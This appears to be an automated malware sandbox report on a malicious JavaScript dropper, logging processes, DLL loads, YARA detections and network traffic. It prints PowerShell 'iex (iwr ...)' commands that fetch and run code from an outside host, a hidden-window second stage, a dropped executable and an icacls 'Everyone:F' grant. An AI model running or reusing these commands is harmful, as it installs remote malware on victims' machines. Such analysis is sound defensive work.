        Source: powershell.exe, 00000006.00000002.1879594049.00000235803A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://saffplano.com/fsp/visionApps.zipXz
        Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
        Source: unknownHTTPS traffic detected: 104.21.75.126:443 -> 192.168.11.20:49713 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.75.126:443 -> 192.168.11.20:49714 version: TLS 1.2

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: amsi64_7204.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: amsi64_6420.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Process Memory Space: powershell.exe PID: 6420, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        PE file contains section with special chars
        Source: visionApps.exe.6.drStatic PE information: section name:
        Source: visionApps.exe.6.drStatic PE information: section name:
        Source: visionApps.exe.6.drStatic PE information: section name:
        Source: visionApps.exe.6.drStatic PE information: section name:
        Source: visionApps.exe.6.drStatic PE information: section name:
        Source: visionApps.exe.6.drStatic PE information: section name:
        Source: visionApps.exe.6.drStatic PE information: section name:
        Source: visionApps.exe.6.drStatic PE information: section name:
        Source: visionApps.exe.6.drStatic PE information: section name:
        Powershell drops PE file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeJump to dropped file
        Windows Scripting host queries suspicious COM object (likely to drop second stage)
        Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
        Wscript starts Powershell (via cmd or directly)
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command " iex (iwr https://saffplano.com/download/uploads/eERu1UrKpkUv.txt -UseBasicParsing).Content "
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command " iex (iwr https://saffplano.com/download/uploads/eERu1UrKpkUv.txt -UseBasicParsing).Content "Jump to behavior
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeProcess Stats: CPU usage > 6%
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeFile created: C:\Windows\SysWOW64\error.logJump to behavior
        Source: OPRfEWLTto.jsInitial sample: Strings found which are bigger than 50
        Source: visionApps.exe.6.drStatic PE information: Number of sections : 18 > 10
        Source: amsi64_7204.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: amsi64_6420.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: Process Memory Space: powershell.exe PID: 6420, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: visionApps.exe.6.drStatic PE information: Section: ZLIB complexity 1.001953125
        Source: visionApps.exe.6.drStatic PE information: Section: ZLIB complexity 0.9945721293604651
        Source: visionApps.exe.6.drStatic PE information: Section: ZLIB complexity 1.000351688102894
        Source: visionApps.exe.6.drStatic PE information: Section: ZLIB complexity 0.997314453125
        Source: visionApps.exe.6.drStatic PE information: Section: .reloc ZLIB complexity 1.5
        Source: classification engineClassification label: mal100.spyw.expl.evad.winJS@12/16@1/1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4948:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2708:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4948:120:WilError_03
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeMutant created: \Sessions\1\BaseNamedObjects\fedd1d1122aa65028c81e16ceb85d9c73790a2fa
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2708:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hqf2aedw.zai.ps1Jump to behavior
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
        Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: OPRfEWLTto.jsReversingLabs: Detection: 26%
        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\OPRfEWLTto.js"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command " iex (iwr https://saffplano.com/download/uploads/eERu1UrKpkUv.txt -UseBasicParsing).Content "
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -Command "iex (iwr https://saffplano.com/download/uploads/KciVS6w55td9u.txt -UseBasicParsing).Content"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\icacls.exe "C:\Windows\system32\icacls.exe" C:\Users\user\AppData\Roaming\App_86026 "/grant Everyone:F" /T /C
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\App_86026\visionApps.exe "C:\Users\user\AppData\Roaming\App_86026\visionApps.exe"
        Source: unknownProcess created: C:\Users\user\AppData\Roaming\App_86026\visionApps.exe "C:\Users\user\AppData\Roaming\App_86026\visionApps.exe"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command " iex (iwr https://saffplano.com/download/uploads/eERu1UrKpkUv.txt -UseBasicParsing).Content "Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\icacls.exe "C:\Windows\system32\icacls.exe" C:\Users\user\AppData\Roaming\App_86026 "/grant Everyone:F" /T /CJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\App_86026\visionApps.exe "C:\Users\user\AppData\Roaming\App_86026\visionApps.exe" Jump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pcacli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: scrrun.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\icacls.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeSection loaded: wtsapi32.dllJump to behavior
